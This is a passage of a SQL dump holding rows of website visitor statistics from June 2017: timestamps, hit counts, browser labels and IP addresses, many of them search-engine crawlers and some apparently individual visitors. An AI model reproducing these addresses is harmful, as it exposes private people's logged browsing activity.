.154.200.45','other'),(118717,1496758065,1,1,0,0,'217.182.132.85','other'),(118718,1496758102,1,1,0,0,'141.8.142.15','other'),(118719,1496758133,1,1,0,0,'141.8.142.154','other'),(118720,1496758165,1,1,0,0,'95.108.213.7','other'),(118721,1496758187,1,1,0,0,'87.250.224.7','other'),(118722,1496758263,1,1,0,0,'217.182.132.65','other'),(118723,1496758268,1,1,0,0,'141.8.132.25','other'),(118724,1496758281,1,1,0,0,'164.132.161.20','other'),(118725,1496758386,1,1,0,0,'141.8.142.38','other'),(118726,1496758387,1,0,1,0,'66.249.66.199',''),(118727,1496758390,1,1,0,0,'178.154.189.3','other'),(118729,1496758400,1,1,0,0,'195.49.151.89','chrome'),(118730,1496758464,1,1,0,0,'51.255.65.22','other'),(118731,1496758828,1,0,1,0,'66.249.66.157',''),(118732,1496758991,1,1,0,0,'217.76.198.186','chrome'),(118733,1496759026,1,1,0,0,'217.182.132.90','other'),(118734,1496759083,1,0,1,0,'66.249.76.93',''),(118735,1496759811,1,1,0,0,'66.249.93.91','chrome'),(118736,1496760183,1,1,0,0,'217.182.132.147','other'),(118737,1496760908,1,1,0,0,'164.132.161.56','other'),(118738,1496760921,1,1,0,0,'91.196.178.38','firefox'),(118739,1496761019,1,1,0,0,'51.255.71.129','other'),(118740,1496761277,1,1,0,0,'51.255.65.75','other'),(118741,1496761452,1,1,0,0,'51.255.65.95','other'),(118742,1496761596,1,1,0,0,'157.55.39.151','other'),(118743,1496761613,1,1,0,0,'217.182.132.179','other'),(118744,1496762134,1,1,0,0,'51.255.65.31','other'),(118745,1496762390,1,1,0,0,'217.182.132.24','other'),(118746,1496763319,1,1,0,0,'51.255.71.121','other'),(118747,1496763813,1,1,0,0,'217.182.132.18','other'),(118748,1496764096,1,0,1,0,'66.249.76.91',''),(118749,1496764129,1,1,0,0,'51.255.65.18','other'),(118750,1496764165,1,1,0,0,'217.182.132.77','other'),(118751,1496764793,1,1,0,0,'217.182.132.85','other'),(118752,1496765341,1,1,0,0,'164.132.161.34','other'),(118753,1496765546,1,1,0,0,'51.255.65.55','other'),(118754,1496765989,1,0,1,0,'66.249.76.89',''),(118755,1496766210,1,1,0,0,'66.249.76.91','chrome'),(118756,1496766410,1,1,0,0,'164.132.161.54','other'),(118757,1496766467,1,1,0,0,'217.182.132.28','other'),(118758,1496766571,1,0,1,0,'66.249.76.109',''),(118759,1496766981,1,1,0,0,'217.182.132.94','other'),(118760,1496767055,1,0,1,0,'66.249.76.89',''),(118761,1496767974,1,0,1,0,'66.249.76.91',''),(118762,1496768272,1,1,0,0,'8.29.198.25','other'),(118763,1496768543,1,1,0,0,'217.182.132.63','other'),(118764,1496768559,1,1,0,0,'51.255.71.127','other'),(118765,1496768770,1,1,0,0,'137.74.203.194','other'),(118766,1496768981,1,0,1,0,'68.180.230.48',''),(118767,1496769045,1,1,0,0,'176.31.231.10','other'),(118768,1496769391,1,1,0,0,'94.180.132.93','chrome'),(118769,1496769392,1,1,0,0,'176.193.157.235','opera'),(118770,1496769438,1,1,0,0,'137.74.207.159','other'),(118771,1496770025,1,1,0,0,'164.132.161.13','other'),(118772,1496770050,1,1,0,0,'217.182.132.58','other'),(118773,1496770162,1,1,0,0,'164.132.161.42','other'),(118774,1496770408,2,2,0,0,'66.249.76.89','chrome'),(118775,1496770474,1,1,0,0,'51.255.65.65','other'),(118776,1496771412,2,2,0,0,'66.249.66.199','chrome'),(118777,1496771477,1,1,0,0,'5.255.253.58','other'),(118778,1496772163,1,1,0,0,'217.182.132.70','other'),(118779,1496772355,1,0,1,0,'66.249.66.156',''),(118780,1496772372,1,1,0,0,'51.255.65.80','other'),(118781,1496772451,1,1,0,0,'157.55.39.151','other'),(118782,1496772545,1,1,0,0,'217.182.132.172','other'),(118783,1496772612,2,2,0,0,'54.146.118.116','chrome'),(118784,1496773475,1,1,0,0,'51.255.65.43','other'),(118785,1496773564,2,2,0,0,'91.209.11.236','other'),(118786,1496773602,1,1,0,0,'217.182.132.18','other'),(118787,1496774272,1,1,0,0,'95.135.61.2','firefox'),(118788,1496775033,1,1,0,0,'164.132.161.37','other'),(118789,1496775237,1,1,0,0,'217.182.132.73','other'),(118790,1496775933,1,1,0,0,'66.249.64.67','chrome'),(118791,1496775992,1,1,0,0,'217.182.132.21','other'),(118792,1496776200,1,1,0,0,'91.196.178.163','chrome'),(118793,1496776608,1,1,0,0,'164.132.161.50','other'),(118794,1496777300,1,1,0,0,'141.8.142.154','other'),(118795,1496777314,1,1,0,0,'66.249.64.73','chrome'),(118796,1496777462,1,1,0,0,'164.132.162.188','other'),(118797,1496777828,1,1,0,0,'164.132.161.67','other'),(118798,1496777980,1,0,1,0,'66.249.64.15',''),(118799,1496778431,1,1,0,0,'40.77.167.26','other'),(118800,1496779018,1,1,0,0,'164.132.161.68','other'),(118801,1496779137,1,1,0,0,'8.29.198.27','other'),(118802,1496779387,1,0,1,0,'66.249.64.71',''),(118803,1496779495,1,1,0,0,'91.196.178.167','chrome'),(118804,1496779623,1,1,0,0,'217.182.132.21','other'),(118805,1496779915,1,0,1,0,'66.249.64.14',''),(118806,1496780016,1,1,0,0,'51.255.71.98','other'),(118807,1496780252,1,1,0,0,'217.182.132.146','other'),(118808,1496780400,1,1,0,0,'91.209.11.236','other'),(118809,1496780964,1,1,0,0,'164.132.161.73','other'),(118810,1496780974,1,1,0,0,'217.182.132.37','other'),(118811,1496781293,1,1,0,0,'37.73.226.114','chrome'),(118812,1496781579,1,1,0,0,'40.77.167.26','other'),(118813,1496781584,1,1,0,0,'46.211.154.250','chrome'),(118814,1496782668,1,0,1,0,'66.249.64.13',''),(118815,1496783782,1,0,1,0,'66.249.64.13',''),(118816,1496785074,1,1,0,0,'51.255.65.43','other'),(118817,1496785361,1,1,0,0,'51.255.65.55','other'),(118818,1496785511,1,1,0,0,'51.255.65.88','other'),(118819,1496785803,1,0,1,0,'66.249.64.13',''),(118820,1496785862,1,1,0,0,'40.77.167.26','other'),(118821,1496785884,1,0,1,0,'66.249.64.155',''),(118822,1496786039,1,1,0,0,'51.255.65.86','other'),(118823,1496786088,1,1,0,0,'66.249.64.157','chrome'),(118824,1496786093,1,1,0,0,'66.249.64.155','chrome'),(118825,1496786218,1,1,0,0,'164.132.162.164','other'),(118826,1496786730,1,1,0,0,'217.182.132.14','other'),(118827,1496787357,1,1,0,0,'176.31.231.10','other'),(118828,1496787413,1,1,0,0,'37.115.169.71','firefox'),(118829,1496787980,1,1,0,0,'51.255.65.4','other'),(118830,1496788704,1,1,0,0,'51.255.65.60','other'),(118831,1496788792,1,0,1,0,'66.249.64.30',''),(118832,1496789495,3,3,0,0,'91.209.11.236','other'),(118833,1496789847,1,1,0,0,'217.182.132.65','other'),(118834,1496789903,1,1,0,0,'164.132.161.61','other'),(118835,1496789904,1,1,0,0,'217.182.132.70','other'),(118836,1496789997,1,1,0,0,'8.29.198.27','other'),(118837,1496790024,1,1,0,0,'217.182.132.29','other'),(118838,1496790125,1,1,0,0,'51.255.65.34','other'),(118839,1496790657,1,0,1,0,'66.249.64.28',''),(118840,1496792165,1,1,0,0,'164.132.161.68','other'),(118841,1496792302,1,1,0,0,'164.132.161.53','other'),(118842,1496792530,1,0,1,0,'66.249.64.153',''),(118843,1496792649,1,0,1,0,'66.249.64.28',''),(118844,1496792808,1,1,0,0,'217.182.132.73','other'),(118845,1496792904,1,1,0,0,'164.132.161.26','other'),(118846,1496793802,1,1,0,0,'217.182.132.33','other'),(118847,1496793965,1,0,1,0,'68.180.230.48',''),(118848,1496794027,1,1,0,0,'51.255.65.7','other'),(118849,1496794068,1,0,1,0,'66.249.64.155',''),(118850,1496794503,1,1,0,0,'51.255.65.35','other'),(118851,1496794515,1,1,0,0,'164.132.161.69','other'),(118852,1496794671,1,1,0,0,'51.255.65.26','other'),(118853,1496795249,1,1,0,0,'217.182.132.97','other'),(118854,1496795974,1,1,0,0,'66.102.9.29','chrome'),(118855,1496796112,1,0,1,0,'66.249.64.157',''),(118856,1496796250,1,0,1,0,'66.249.64.153',''),(118857,1496797070,3,3,0,0,'95.108.213.34','other'),(118858,1496798438,1,1,0,0,'217.182.132.50','other'),(118859,1496799097,1,1,0,0,'217.182.132.55','other'),(118860,1496799853,1,1,0,0,'51.255.65.25','other'),(118861,1496800083,1,0,1,0,'66.249.64.155',''),(118862,1496800569,1,1,0,0,'51.255.65.10','other'),(118863,1496800815,1,1,0,0,'217.182.132.23','other'),(118864,1496800897,1,1,0,0,'8.29.198.26','other'),(118865,1496801806,1,1,0,0,'217.182.132.75','other'),(118866,1496802422,1,1,0,0,'137.74.207.170','other'),(118867,1496802524,1,1,0,0,'51.255.65.224','other'),(118868,1496802876,1,0,1,0,'66.249.64.157',''),(118869,1496803396,1,1,0,0,'51.255.65.90','other'),(118870,1496803440,1,1,0,0,'51.255.65.30','other'),(118871,1496803917,2,0,2,0,'66.249.64.30',''),(118872,1496803987,1,1,0,0,'217.182.132.181','other'),(118873,1496804040,1,1,0,0,'164.132.161.79','other'),(118874,1496804067,1,1,0,0,'91.209.11.236','other'),(118875,1496804515,1,1,0,0,'217.182.132.77','other'),(118876,1496805135,1,1,0,0,'51.255.65.30','other'),(118877,1496805265,1,0,1,0,'66.249.64.155',''),(118878,1496805600,1,1,0,0,'217.182.132.55','other'),(118879,1496805752,1,1,0,0,'164.132.161.38','other'),(118880,1496805998,1,1,0,0,'217.182.132.192','other'),(118881,1496806519,1,1,0,0,'217.182.132.156','other'),(118882,1496806922,1,0,1,0,'66.249.64.153',''),(118883,1496807329,1,1,0,0,'51.255.65.29','other'),(118884,1496807675,1,0,1,0,'66.249.64.155',''),(118885,1496807722,1,1,0,0,'164.132.162.154','other'),(118886,1496807783,1,1,0,0,'66.249.64.155','chrome'),(118887,1496808078,1,1,0,0,'157.55.39.151','other'),(118888,1496808668,1,0,1,0,'66.249.64.157',''),(118889,1496808744,1,1,0,0,'217.182.132.156','other'),(118890,1496808763,2,1,1,0,'66.249.64.155',''),(118891,1496809185,1,1,0,0,'157.55.39.151','other'),(118892,1496809290,1,1,0,0,'51.255.71.121','other'),(118893,1496809423,1,1,0,0,'66.249.64.29','chrome'),(118894,1496809874,14,0,14,0,'66.249.64.153',''),(118895,1496809877,3,0,3,0,'66.249.64.155',''),(118896,1496810679,1,1,0,0,'51.255.65.33','other'),(118897,1496810813,42,0,42,0,'66.249.64.153',''),(118898,1496810837,2,0,2,0,'66.249.64.157',''),(118899,1496810842,12,0,12,0,'66.249.64.155',''),(118900,1496811024,1,1,0,0,'180.76.15.151','other'),(118901,1496811087,1,0,1,0,'66.249.66.74',''),(118902,1496811158,1,0,1,0,'68.180.230.48',''),(118903,1496811496,4,1,3,0,'66.249.64.153',''),(118904,1496811756,1,1,0,0,'8.29.198.27','other'),(118905,1496812372,1,1,0,0,'217.182.132.191','other'),(118906,1496812406,2,2,0,0,'51.255.65.42','other'),(118907,1496812465,9,0,9,0,'66.249.64.153',''),(118908,1496812548,1,1,0,0,'217.182.132.173','other'),(118909,1496812973,6,0,6,0,'66.249.64.155',''),(118910,1496813123,2,0,2,0,'66.249.64.157',''),(118911,1496813368,7,0,7,0,'66.249.64.153',''),(118912,1496813595,1,1,0,0,'51.255.65.59','other'),(118913,1496814117,1,1,0,0,'217.182.132.192','other'),(118914,1496814124,1,0,1,0,'66.249.64.28',''),(118915,1496814167,1,0,1,0,'66.249.64.155',''),(118916,1496814336,1,1,0,0,'217.182.132.147','other'),(118917,1496814418,1,1,0,0,'194.42.196.174','msie'),(118918,1496814452,1,1,0,0,'164.132.161.85','other'),(118919,1496814513,1,1,0,0,'91.196.178.38','chrome'),(118920,1496815317,1,1,0,0,'217.182.132.191','other'),(118921,1496815459,1,1,0,0,'164.132.162.159','other'),(118922,1496815675,1,0,1,0,'66.249.64.155',''),(118923,1496815965,1,1,0,0,'137.74.207.164','other'),(118924,1496816050,1,1,0,0,'217.182.132.181','other'),(118925,1496816109,1,1,0,0,'217.182.132.87','other'),(118926,1496816238,1,1,0,0,'51.255.65.56','other'),(118927,1496816401,1,0,1,0,'66.249.64.157',''),(118928,1496816645,1,0,1,0,'66.249.64.30',''),(118929,1496816737,1,1,0,0,'217.182.132.78','other'),(118930,1496817675,1,0,1,0,'66.249.64.155',''),(118931,1496817684,1,1,0,0,'91.209.11.236','other'),(118932,1496818133,1,1,0,0,'137.74.207.108','other'),(118933,1496818177,1,0,1,0,'66.249.64.153',''),(118934,1496818682,1,1,0,0,'137.74.207.109','other'),(118935,1496818771,1,0,1,0,'66.249.64.155',''),(118936,1496819596,1,1,0,0,'164.132.161.97','other'),(118937,1496819669,1,1,0,0,'40.77.167.126','other'),(118938,1496819902,1,1,0,0,'217.182.132.190','other'),(118939,1496820053,1,1,0,0,'46.164.144.86','chrome'),(118940,1496820068,1,1,0,0,'37.52.122.118','chrome'),(118941,1496820082,1,1,0,0,'46.200.109.34','chrome'),(118942,1496820357,1,1,0,0,'157.55.39.151','other'),(118943,1496820489,1,1,0,0,'217.182.132.155','other'),(118944,1496820523,1,1,0,0,'51.255.65.58','other'),(118945,1496820583,1,1,0,0,'37.53.161.235','chrome'),(118946,1496820641,1,1,0,0,'164.132.161.41','other'),(118947,1496820897,1,0,1,0,'66.249.64.153',''),(118948,1496820915,1,1,0,0,'51.255.71.116','other'),(118949,1496820981,1,1,0,0,'164.132.161.80','other'),(118950,1496821402,1,1,0,0,'91.209.11.236','other'),(118951,1496821788,1,1,0,0,'164.132.161.79','other'),(118952,1496821871,1,1,0,0,'217.182.132.96','other'),(118953,1496821941,1,1,0,0,'51.255.65.49','other'),(118954,1496822263,2,1,1,0,'66.249.64.153',''),(118955,1496822309,1,1,0,0,'5.1.15.42','chrome'),(118956,1496822494,1,1,0,0,'66.249.64.30','chrome'),(118957,1496822585,1,0,1,0,'66.249.64.29',''),(118958,1496822624,1,1,0,0,'8.29.198.27','other'),(118959,1496822812,1,1,0,0,'185.182.81.83','chrome'),(118960,1496823065,1,1,0,0,'46.201.224.170','chrome'),(118961,1496823113,1,1,0,0,'91.196.178.72','chrome'),(118962,1496823583,1,1,0,0,'178.95.245.114','chrome'),(118963,1496823594,1,1,0,0,'164.132.161.79','other'),(118964,1496824049,1,1,0,0,'217.182.132.57','other'),(118965,1496824127,1,1,0,0,'51.255.71.125','other'),(118966,1496824265,1,1,0,0,'51.255.71.98','other'),(118967,1496824401,2,2,0,0,'91.196.178.72','chrome'),(118968,1496824570,1,1,0,0,'92.112.109.230','chrome'),(118969,1496824611,1,1,0,0,'51.255.65.95','other'),(118970,1496824681,1,1,0,0,'91.196.178.168','firefox'),(118971,1496824704,1,1,0,0,'164.132.162.157','other'),(118972,1496824716,1,1,0,0,'51.255.65.28','other'),(118973,1496824762,1,1,0,0,'217.182.132.68','other'),(118974,1496825397,1,1,0,0,'51.255.65.11','other'),(118975,1496825495,1,0,1,0,'68.180.230.48',''),(118976,1496825535,1,1,0,0,'91.196.178.72','chrome'),(118977,1496825646,1,0,1,0,'66.249.64.153',''),(118978,1496825750,1,0,1,0,'66.249.64.155',''),(118979,1496825782,1,1,0,0,'51.255.65.93','other'),(118980,1496825800,1,1,0,0,'91.196.178.34','chrome'),(118981,1496826085,1,1,0,0,'217.182.132.86','other'),(118982,1496826244,1,0,1,0,'66.249.64.157',''),(118983,1496826303,1,1,0,0,'51.255.65.87','other'),(118984,1496826351,1,1,0,0,'66.249.64.157','chrome'),(118985,1496826620,1,1,0,0,'194.44.227.16','firefox'),(118986,1496826639,1,1,0,0,'66.249.64.29','chrome'),(118987,1496826642,1,0,1,0,'66.249.64.153',''),(118988,1496826678,1,1,0,0,'51.255.65.40','other'),(118989,1496826869,1,1,0,0,'37.54.188.129','chrome'),(118990,1496826875,1,1,0,0,'217.182.132.146','other'),(118991,1496826911,1,1,0,0,'164.132.161.3','other'),(118992,1496827250,2,2,0,0,'91.196.177.15','chrome'),(118993,1496827397,1,1,0,0,'46.164.144.86','firefox'),(118994,1496827445,1,0,1,0,'66.249.64.155',''),(118995,1496827947,1,1,0,0,'217.182.132.152','other'),(118996,1496827996,1,1,0,0,'195.49.151.89','chrome'),(118997,1496828012,1,1,0,0,'93.158.152.79','other'),(118998,1496828166,2,2,0,0,'157.55.39.67','other'),(118999,1496828275,1,1,0,0,'51.255.65.86','other'),(119000,1496828588,1,1,0,0,'91.196.178.71','chrome'),(119001,1496828597,2,2,0,0,'141.8.142.154','other'),(119002,1496828625,1,1,0,0,'5.255.253.58','other'),(119003,1496828839,1,0,1,0,'66.249.64.157',''),(119004,1496828875,1,0,1,0,'66.249.64.155',''),(119005,1496829345,1,0,1,0,'66.249.64.153',''),(119006,1496829350,1,1,0,0,'217.182.132.31','other'),(119007,1496829460,1,1,0,0,'176.122.100.21','chrome'),(119008,1496829475,1,0,1,0,'66.249.64.28',''),(119009,1496829673,1,1,0,0,'91.196.178.71','chrome'),(119010,1496830119,3,0,3,0,'66.249.64.157',''),(119011,1496830149,1,1,0,0,'40.77.167.126','other'),(119012,1496830203,1,1,0,0,'164.132.161.30','other'),(119013,1496830250,2,0,2,0,'66.249.64.155',''),(119014,1496830260,1,1,0,0,'51.255.65.33','other'),(119015,1496830394,2,1,1,0,'66.249.64.153',''),(119016,1496830462,2,2,0,0,'62.212.73.211','other'),(119017,1496830801,1,1,0,0,'66.249.64.153','chrome'),(119018,1496830831,1,0,1,0,'66.249.64.30',''),(119019,1496830957,1,1,0,0,'217.182.132.19','other'),(119020,1496831282,1,1,0,0,'164.132.161.85','other'),(119021,1496831333,1,1,0,0,'87.250.224.18','other'),(119022,1496831338,1,1,0,0,'178.154.149.3','other'),(119023,1496831659,1,1,0,0,'141.8.142.38','other'),(119024,1496831671,1,1,0,0,'37.52.179.235','chrome'),(119025,1496831710,1,1,0,0,'180.76.15.146','other'),(119026,1496831878,1,1,0,0,'217.182.132.5','other'),(119027,1496831890,1,1,0,0,'207.46.13.0','other'),(119028,1496832199,1,1,0,0,'91.206.253.29','chrome'),(119029,1496832686,1,1,0,0,'31.16.107.233','firefox'),(119030,1496832820,2,0,2,0,'66.249.64.157',''),(119031,1496833492,1,1,0,0,'8.29.198.26','other'),(119032,1496833630,1,0,1,0,'68.180.230.48',''),(119033,1496834267,1,1,0,0,'217.182.132.78','other'),(119034,1496834400,23,23,0,0,'5.9.63.162','other'),(119035,1496834838,1,1,0,0,'91.196.177.26','chrome'),(119036,1496835416,1,1,0,0,'217.182.132.171','other'),(119037,1496835968,1,0,1,0,'66.249.64.28',''),(119038,1496836151,1,1,0,0,'137.74.201.99','other'),(119039,1496836228,1,0,1,0,'66.249.64.157',''),(119040,1496836719,1,1,0,0,'178.62.128.67','firefox'),(119041,1496836727,1,1,0,0,'46.164.144.86','firefox'),(119042,1496837167,1,1,0,0,'164.132.161.87','other'),(119043,1496837768,5,5,0,0,'95.108.179.15','other'),(119044,1496837786,1,1,0,0,'51.255.71.112','other'),(119045,1496837976,4,4,0,0,'141.8.142.154','other'),(119046,1496838035,2,2,0,0,'95.108.213.34','other'),(119047,1496838177,2,2,0,0,'5.255.253.63','other'),(119048,1496838221,2,2,0,0,'141.8.142.15','other'),(119049,1496838311,4,4,0,0,'141.8.142.164','other'),(119050,1496838480,1,0,1,0,'66.249.64.155',''),(119051,1496838489,1,1,0,0,'137.74.207.101','other'),(119052,1496838603,2,2,0,0,'87.250.224.7','other'),(119053,1496838837,1,1,0,0,'176.117.82.109','chrome'),(119054,1496838884,1,1,0,0,'178.154.189.3','other'),(119055,1496839040,1,1,0,0,'141.8.142.154','other'),(119056,1496839120,1,1,0,0,'91.196.178.38','chrome'),(119057,1496839279,1,1,0,0,'217.182.132.50','other'),(119058,1496839366,1,1,0,0,'66.249.64.30','chrome'),(119059,1496839384,1,1,0,0,'141.8.142.164','other'),(119060,1496839443,1,1,0,0,'51.255.71.117','other'),(119061,1496839484,1,1,0,0,'95.108.213.34','other'),(119062,1496839694,1,0,1,0,'66.249.64.157',''),(119063,1496839759,1,1,0,0,'91.196.178.136','chrome'),(119064,1496840065,1,1,0,0,'217.182.132.191','other'),(119065,1496840068,2,1,1,0,'66.249.64.29',''),(119066,1496840073,8,8,0,0,'208.110.66.130','firefox'),(119067,1496840079,2,2,0,0,'208.110.66.130','msie'),(119068,1496840308,1,1,0,0,'51.255.65.14','other'),(119069,1496840358,1,1,0,0,'37.54.144.8','chrome'),(119070,1496840370,1,1,0,0,'80.78.63.54','other'),(119071,1496840393,1,1,0,0,'95.108.213.34','other'),(119072,1496840540,1,0,1,0,'66.249.64.153',''),(119073,1496840597,1,1,0,0,'37.52.172.185','firefox'),(119074,1496840607,1,1,0,0,'93.158.152.79','other'),(119075,1496840739,1,1,0,0,'91.196.178.72','chrome'),(119076,1496840834,1,1,0,0,'217.182.132.153','other'),(119077,1496840880,1,1,0,0,'217.182.132.19','other'),(119078,1496841193,1,1,0,0,'109.236.81.160','chrome'),(119079,1496841235,1,0,1,0,'68.180.230.48',''),(119080,1496841477,1,1,0,0,'51.255.65.52','other'),(119081,1496841508,1,1,0,0,'66.249.64.28','chrome'),(119082,1496841807,1,0,1,0,'66.249.64.153',''),(119083,1496841948,1,1,0,0,'178.154.200.45','other'),(119084,1496842031,1,1,0,0,'94.45.133.84','chrome'),(119085,1496842166,1,1,0,0,'164.132.161.71','other'),(119086,1496842429,1,1,0,0,'51.255.65.79','other'),(119087,1496842663,1,1,0,0,'51.255.71.130','other'),(119088,1496842869,1,0,1,0,'66.249.64.29',''),(119089,1496842988,1,1,0,0,'109.236.81.160','chrome'),(119090,1496843262,1,1,0,0,'91.196.177.46','firefox'),(119091,1496843448,1,1,0,0,'164.132.162.187','other'),(119092,1496843529,1,1,0,0,'40.77.167.126','other'),(119093,1496843856,1,1,0,0,'91.196.178.72','chrome'),(119094,1496843916,1,1,0,0,'137.74.207.119','other'),(119095,1496844048,1,1,0,0,'95.108.179.15','other'),(119096,1496844329,1,0,1,0,'66.249.64.29',''),(119097,1496844363,1,1,0,0,'8.29.198.26','other'),(119098,1496844788,1,1,0,0,'109.236.81.160','chrome'),(119099,1496844847,1,1,0,0,'37.9.113.38','other'),(119100,1496845305,1,0,1,0,'66.249.64.28',''),(119101,1496845600,1,1,0,0,'164.132.161.47','other'),(119102,1496845723,1,1,0,0,'95.108.213.34','other'),(119103,1496846050,1,1,0,0,'217.182.132.192','other'),(119104,1496846057,1,0,1,0,'66.249.64.153',''),(119105,1496846088,1,1,0,0,'91.196.178.103','chrome'),(119106,1496846316,1,0,1,0,'68.180.230.48',''),(119107,1496846588,1,1,0,0,'109.236.81.160','chrome'),(119108,1496846633,1,1,0,0,'178.154.200.45','other'),(119109,1496846647,1,1,0,0,'95.108.179.21','other'),(119110,1496846650,1,1,0,0,'178.154.189.16','other'),(119111,1496846858,1,1,0,0,'5.255.253.81','other'),(119112,1496846873,1,1,0,0,'141.8.132.50','other'),(119113,1496846919,1,0,1,0,'66.249.64.30',''),(119114,1496847747,1,1,0,0,'137.74.207.108','other'),(119116,1496847872,1,0,1,0,'66.249.64.29',''),(119117,1496847966,1,0,1,0,'66.249.64.153',''),(119118,1496848036,1,1,0,0,'201.18.18.173','firefox'),(119119,1496848388,1,1,0,0,'109.236.81.160','chrome'),(119120,1496848482,1,1,0,0,'217.182.132.152','other'),(119121,1496849452,1,1,0,0,'87.250.224.7','other'),(119122,1496849769,1,1,0,0,'51.255.65.95','other'),(119123,1496849838,1,1,0,0,'137.74.201.99','other'),(119124,1496849961,1,0,1,0,'66.249.64.13',''),(119125,1496850027,1,1,0,0,'51.255.65.83','other'),(119126,1496850189,1,1,0,0,'109.236.81.160','chrome'),(119127,1496850309,1,1,0,0,'66.102.9.27','chrome'),(119128,1496850502,1,0,1,0,'68.180.230.48',''),(119129,1496851119,1,1,0,0,'217.182.132.170','other'),(119130,1496852000,1,1,0,0,'109.236.81.160','chrome'),(119131,1496852271,1,1,0,0,'51.255.65.96','other'),(119132,1496852655,1,1,0,0,'66.249.64.71','chrome'),(119133,1496852968,1,1,0,0,'51.255.65.77','other'),(119134,1496853207,1,1,0,0,'51.255.65.95','other'),(119135,1496853755,1,1,0,0,'164.132.161.78','other'),(119136,1496853788,1,1,0,0,'109.236.81.160','chrome'),(119137,1496853899,1,1,0,0,'164.132.161.62','other'),(119138,1496853902,1,1,0,0,'51.255.65.23','other'),(119139,1496854062,1,1,0,0,'164.132.161.20','other'),(119140,1496854098,1,1,0,0,'51.255.71.122','other'),(119141,1496854611,5,5,0,0,'46.4.32.75','other'),(119142,1496854847,1,0,1,0,'66.249.64.71',''),(119143,1496855239,1,1,0,0,'8.29.198.27','other'),(119144,1496855556,1,1,0,0,'207.46.13.112','other'),(119145,1496855589,1,1,0,0,'109.236.81.160','chrome'),(119146,1496855775,1,1,0,0,'217.182.132.96','other'),(119147,1496855814,1,1,0,0,'164.132.161.54','other'),(119148,1496856180,1,1,0,0,'141.8.142.164','other'),(119149,1496856322,1,1,0,0,'51.255.65.51','other'),(119150,1496856563,1,1,0,0,'137.74.207.108','other'),(119151,1496856671,1,0,1,0,'68.180.230.48',''),(119152,1496856825,1,1,0,0,'217.182.132.80','other'),(119153,1496856920,1,1,0,0,'51.255.65.60','other'),(119154,1496857358,1,1,0,0,'137.74.201.108','other'),(119155,1496857389,1,1,0,0,'109.236.81.160','chrome'),(119156,1496857600,1,0,1,0,'66.249.64.14',''),(119157,1496857637,1,1,0,0,'66.249.64.13','chrome'),(119158,1496858565,1,1,0,0,'66.102.9.38','chrome'),(119159,1496859191,1,1,0,0,'109.236.81.160','chrome'),(119160,1496859352,1,1,0,0,'217.182.132.19','other'),(119161,1496859681,1,1,0,0,'91.209.11.236','other'),(119162,1496859704,1,0,1,0,'66.249.64.73',''),(119163,1496860357,1,1,0,0,'217.182.132.173','other'),(119164,1496860586,2,2,0,0,'91.209.11.236','other'),(119165,1496860727,1,1,0,0,'157.55.39.67','other'),(119166,1496860990,1,1,0,0,'109.236.81.160','chrome'),(119167,1496861000,1,0,1,0,'68.180.230.48',''),(119168,1496861188,1,1,0,0,'66.249.64.71','chrome'),(119169,1496861195,1,1,0,0,'217.182.132.152','other'),(119170,1496862042,1,1,0,0,'207.46.13.112','other'),(119171,1496862343,1,1,0,0,'91.209.11.236','other'),(119172,1496862369,1,1,0,0,'51.255.65.89','other'),(119173,1496862476,1,0,1,0,'66.249.64.67',''),(119174,1496862684,1,1,0,0,'5.255.253.81','other'),(119175,1496862788,1,1,0,0,'109.236.81.160','chrome'),(119176,1496862959,1,1,0,0,'217.182.132.178','other'),(119177,1496863268,1,0,1,0,'66.249.64.71',''),(119178,1496863270,2,0,2,0,'66.249.64.13',''),(119179,1496863338,1,0,1,0,'68.180.230.48',''),(119180,1496863396,1,1,0,0,'51.255.65.37','other'),(119181,1496863760,1,1,0,0,'164.132.161.9','other'),(119182,1496863880,3,3,0,0,'208.83.1.168','chrome'),(119183,1496863882,7,7,0,0,'208.83.1.168','other'),(119184,1496863886,2,2,0,0,'208.83.1.168','firefox'),(119185,1496864180,1,1,0,0,'95.108.213.8','other'),(119186,1496864201,2,2,0,0,'178.154.189.3','other'),(119187,1496864217,1,0,1,0,'66.249.64.73',''),(119188,1496864224,1,1,0,0,'91.209.11.236','other'),(119189,1496864254,1,1,0,0,'51.255.71.117','other'),(119190,1496864323,1,1,0,0,'51.255.71.101','other'),(119191,1496864590,1,1,0,0,'109.236.81.160','chrome'),(119192,1496864658,3,1,2,0,'66.249.64.13',''),(119193,1496864694,1,1,0,0,'51.255.65.25','other'),(119194,1496864773,1,0,1,0,'66.249.64.14',''),(119195,1496865731,1,1,0,0,'173.234.153.122','other'),(119196,1496865784,1,0,1,0,'68.180.230.48',''),(119197,1496866088,1,1,0,0,'8.29.198.27','other'),(119198,1496866168,1,0,1,0,'66.249.76.109',''),(119199,1496866388,1,1,0,0,'109.236.81.160','chrome'),(119200,1496866469,1,1,0,0,'51.255.65.81','other'),(119201,1496866572,1,1,0,0,'91.196.178.168','chrome'),(119202,1496867204,1,0,1,0,'68.180.230.48',''),(119203,1496867522,1,1,0,0,'217.182.132.62','other'),(119204,1496867607,1,1,0,0,'217.182.132.65','other'),(119205,1496867762,1,0,1,0,'66.249.66.199',''),(119206,1496868197,1,1,0,0,'109.236.81.160','chrome'),(119207,1496868323,1,1,0,0,'5.255.253.81','other'),(119208,1496868366,1,1,0,0,'93.158.152.79','other'),(119209,1496868404,1,1,0,0,'157.55.39.67','other'),(119210,1496868435,1,1,0,0,'141.8.142.15','other'),(119211,1496868476,1,1,0,0,'141.8.142.38','other'),(119212,1496868746,1,1,0,0,'164.132.161.8','other'),(119213,1496868867,1,1,0,0,'91.196.178.72','chrome'),(119214,1496869016,1,0,1,0,'68.180.230.48',''),(119215,1496869346,1,1,0,0,'164.132.161.83','other'),(119216,1496869910,1,1,0,0,'64.246.165.210','firefox'),(119217,1496869980,1,0,1,0,'66.249.66.156',''),(119218,1496869982,1,1,0,0,'66.249.76.93','chrome'),(119219,1496869988,1,1,0,0,'109.236.81.160','chrome'),(119220,1496870304,1,0,1,0,'66.249.76.108',''),(119221,1496870417,1,0,1,0,'66.249.76.107',''),(119222,1496870649,1,1,0,0,'91.209.11.236','other'),(119223,1496870728,1,1,0,0,'51.255.65.72','other'),(119224,1496870892,1,1,0,0,'51.255.65.14','other'),(119225,1496871351,1,1,0,0,'66.249.76.107','chrome'),(119226,1496871662,1,1,0,0,'51.255.65.17','other'),(119227,1496871725,1,1,0,0,'95.108.213.34','other'),(119228,1496871787,3,3,0,0,'62.210.103.36','other'),(119229,1496871789,1,1,0,0,'109.236.81.160','chrome'),(119230,1496871812,1,1,0,0,'164.132.161.42','other'),(119231,1496872276,1,1,0,0,'91.209.11.236','other'),(119232,1496872288,1,1,0,0,'217.182.